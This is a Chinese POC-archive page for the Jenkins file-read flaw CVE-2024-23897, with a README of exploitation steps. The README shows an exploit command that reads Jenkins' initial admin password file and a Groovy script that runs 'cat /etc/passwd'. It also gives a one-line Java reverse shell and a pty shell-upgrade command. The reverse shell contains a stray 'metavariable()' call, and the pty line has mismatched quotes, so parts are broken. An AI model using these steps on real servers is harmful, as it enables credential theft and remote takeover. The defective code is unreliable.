支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:640

64.0%

POC详情: f376479b9ae5282db46d9fef2b331979f9f036e0

来源
关联漏洞
标题:Jenkins 安全漏洞 (CVE-2024-23897)
描述:Jenkins是Jenkins开源的一个应用软件。一个开源自动化服务器Jenkins提供了数百个插件来支持构建,部署和自动化任何项目。 Jenkins 2.441及之前版本、LTS 2.426.2及之前版本存在安全漏洞,该漏洞源于允许未经身份验证的攻击者读取Jenkins控制器文件系统。
介绍
# Exploit-CVE-2024-23897

# Run the Container
docker run -p 8080:8080 --name vulnerable-jenkins -d jenkins/jenkins:2.441-jdk17

# Check logs
docker logs <machine_name>


# Fetch docker machines IP:
docker inspect vulnerable-jenkins | grep IPAddress


#Exploitation Code:
python3 exploit.py --target http://127.0.0.1:8080 --file /var/jenkins_home/secrets/initialAdminPassword --request-timeout 30



# Groovy Script:
println "cat /etc/passwd".execute().text



# RCE
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(metavariable()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();



# To set environmental variables
export TERM=xterm


#For interactive shell


python -c 'import pty'; pty.spawn("/bin/bash")'
文件快照

[4.0K] /data/pocs/f376479b9ae5282db46d9fef2b331979f9f036e0 ├── [6.1K] exploit.py └── [1.1K] README.md 1 directory, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。